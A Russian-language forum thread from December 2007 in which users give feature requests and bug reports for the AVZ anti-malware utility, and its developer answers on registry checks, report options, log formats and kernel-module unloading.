2. Иногда системные файлы не изменяются, а просто в реестре изменяется ссылка, на файл трояна. Опять же, в случае удаления система не поднимится. Предлагаю так же добавить базу данных ключей изменяемых троянами, и выдавать предупреждения в случае если они ссылаются на файлы отличные от стандартных.
Принимается. Это уже реализовано, и первое, и второе ... в версии 4.29. Осталось только базы набить ..

Geser
23.12.2007, 20:09
Принимается. Это уже реализовано, и первое, и второе ... в версии 4.29. Осталось только базы набить ..

Я еще не копался в новой версии. Я так понял что это сейчас в визардах. Но нужно что бы пометки были в соответствующих разделах HTML отчета. Т.е. если это процесс, то в списке процессов и т.д.
Лучше также убрать для таких файлов в HTML отчете ссылки на автогенерацию комманд удаления. Так меньше шансов что хелпер по ошибке их все же удалит.

santy
24.12.2007, 06:48
Есть ли новый, исправленный релиз (> 4.29.0.9)?

Jef239
24.12.2007, 07:04
Есть ли новый, исправленный релиз (> 4.29.0.9)?
Только что скачал - на сайте по-прежнему 4.29.0.9

Geser
24.12.2007, 12:52
Посмотрел лог новой версии. Очень понравилось что теперь для драйверов есть как опция удалить файл, так и опция остановить/удалить... службу.
Предлагаю для всех остальных объектов автозапуска добавить опцию удаления ключа из реестра.
Думаю так же будет полезно хинтом прописывать полный путь к этому ключу и его значение

barsukRed
24.12.2007, 13:56
В версии 4.29 при использовании ревизора: база создается,но при сравнении диск<>база,при выборе файла базы, в строке тип файлов стоит:$AVZ1129. Соответственно не запускается проверка. Скачал еще раз архив с АВЗ. Все тоже самое. В версии 4.27 все как надо в этой строке:Файлы ревизора(*.frz)

NickGolovko
24.12.2007, 14:09
Это не только с файлами ревизора, но и со всеми прочими диалогами. :)

Зайцев Олег
24.12.2007, 14:10
В версии 4.29 при использовании ревизора: база создается,но при сравнении диск<>база,при выборе файла базы, в строке тип файлов стоит:$AVZ1129. Соответственно не запускается проверка. Скачал еще раз архив с АВЗ. Все тоже самое. В версии 4.27 все как надо в этой строке:Файлы ревизора(*.frz)
Это баг - исправлено

Макcим
24.12.2007, 14:14
Олег, Вы сообщите о выходе исправленной версии?

Зайцев Олег
24.12.2007, 14:47
Олег, Вы сообщите о выходе исправленной версии?
Да, конечно. Просто я затягиваю выход обновления пока активно обнаруживаются баги

santy
24.12.2007, 15:13
Олег, возможно ли в xml-логе исследования использовать одинаковый набор полей для разных категорий исследования:process, dll, drivers, services и др.? С тем, чтобы возможно было логи добавлять в базу данных и проводить сравнительный анализ_обработку для различных хостов.

Зайцев Олег
24.12.2007, 16:20
Олег, возможно ли в xml-логе исследования использовать одинаковый набор полей для разных категорий исследования:process, dll, drivers, services и др.? С тем, чтобы возможно было логи добавлять в базу данных и проводить сравнительный анализ_обработку для различных хостов.
А для этого не нужен идентичный набор полей ... файл кстати описывается идентичным набором атрибутов, а таскать поле PID скажем в списке BHO - несерьезно. делается это так:
1. Заводится несколько таблиц - по одной на каждую категорию
2. Заводится таблицы:
2.1 Справочник категория (поля: код, имя категории)
2.2 Справочник параметров (поля: код, имя категории, тип). Ссылочная целостность на таблицу 2.1
2.3 Справочник "параметры категорий" (поля: код категории, код параметра), ссылочная целостность на 2.1 и 2.2
2.4 таблица "исследования". там код исследования, дата исследования, примечания, признаки ...
2.5 заводим хранилище - таблица с полями: код исследования, код категории, код строки, код параметра, значение параметра). Ссылочная целостность на 2.1, 2.2 и 2.4, логический контроль по 2.3. И там храним все, что нужно ....
так что все просто ...

Jef239
24.12.2007, 16:22
Да, конечно. Просто я затягиваю выход обновления пока активно обнаруживаются баги
А тестеры затягивают тестирование до выхода новой версии. :) По принципу "три бага нашли - ждём новой версии" :biggrin:

Макcим
24.12.2007, 17:50
Если честно, хочется по скорее исправленный релиз. Не работающая DeleteService - это серьезно для "Помогите".

LeeDRuid
24.12.2007, 18:08
А АВЗ совместим с 64 битной версией винды?
У меня не устанавливаются драйвера и не включается гвард, не проходит скрипт на поиск руткитов из за ошибки:
"Поиск перехватчиков API, работающих в KernelMode
Ошибка - не найден файл (C:\WINDOWS\system32\ntoskrnl.exe)"

Я не могу проверить, т.к. система 64битная тока дома) стандартный Скрипт на удаление драйверов я выполнял. Может надо найти старую версию? И выполнить в ней? Где то на первых страницах написали что не важна версия. И где мне в случае необходимости скачать старую? В здешних загрузках как я понимаю тока последняя версия.
Заранее благодарен. "Респект и уважуха" за прогу)

drongo
24.12.2007, 18:30
А АВЗ совместим с 64 битной версией винды?

нет ;) это указано в справке программы, почитайте на досуге:tongue:

Surfer
24.12.2007, 19:24
Возможно ли выгружать/удалять что-либо из "Модуля пространства ядра" ?
Иногда,думаю, бывает нужно.

Зайцев Олег
24.12.2007, 20:18
Возможно ли выгружать/удалять что-либо из "Модуля пространства ядра" ?
Иногда,думаю, бывает нужно.
Это технически невозможно ... выгрузка некоего модуля ядра, на содаржащего потоки, обрабатывающего какие-то запросы (про перехват и фильтры типа фильтра файловой системы я вооще молчу) приведет к BSOD. Драйвер можно "вежливо попросить" выгрузиться, если он пожелает это сделать - то выгрузится. Это есть в менеджере служб и драйверов.